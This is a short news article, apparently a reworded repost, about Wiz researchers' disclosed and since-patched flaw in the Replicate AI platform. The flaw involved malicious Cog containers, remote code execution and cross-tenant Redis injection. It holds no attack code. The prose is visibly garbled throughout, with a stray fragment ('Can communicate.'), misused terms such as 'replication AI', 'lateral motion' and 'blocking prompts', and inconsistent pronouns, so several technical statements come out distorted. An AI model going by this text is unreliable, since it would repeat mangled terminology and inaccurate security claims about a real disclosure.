Researchers found a serious security vulnerability in the Replicate AI platform that put AI models at risk. Since vendors patched the flaw after the bug report, the vulnerability is no longer persistent but still reflects the severity of any vulnerability affecting AI models.

A replication AI vulnerability reveals the vulnerability of AI models.

According to a recent Post From cloud security firm Wiz, their researchers found a serious security issue with Replicate AI.

Replicate AI is an AI-as-a-service provider that enables customers to run machine learning models at scale in the cloud. It provides computational resources to run. Open Source AI Models empower AI enthusiasts with greater personalization and tech freedom to experiment with AI the way they want.

Regarding the vulnerability, Wiz’s post describes a flaw with the Replicate AI platform that an adversary could trigger to threaten other AI models. Specifically, the problem was how an adversary could create and upload malicious Cog containers to the platform and then use it to achieve remote code execution through Replicate AI’s interface. Can communicate. After obtaining the RCE, the researchers obtained lateral motion on the infrastructure, demonstrating the attacker’s approach.

In short, they can leverage their basic RCE privileges to examine the contents of an established TCP connection to a Redis instance within a Kubernetes cluster hosted on Google Cloud Platform.

Because these Redis instances serve multiple users, the researchers realized that they could conduct a cross-tenant data access attack and interfere with the responses that other users should receive by injecting arbitrary data packets. This will help them bypass the Redis authentication requirement, and they can inject rogue tasks to negatively impact other AI models.

Regarding the impact of this risk, the researchers said,

An attacker could query clients’ private AI models, potentially revealing proprietary knowledge or sensitive data involved in the model training process. Additionally, blocking prompts can expose sensitive data, including personally identifiable information (PII).

Replicate AI-deployed mitigations.

After this discovery, the researchers dutifully disclosed the issue to Replicate AI, which fixed the flaw. According to them Post, replication AI deployed full mitigations, further strengthening security with additional mitigations. However, he assured that there was no attempt to exploit the vulnerability.

Additionally, they also announced the implementation of encryption on all inbound traffic and restricting privileged network access for all model containers.

Let us know your thoughts in the comments.



Source link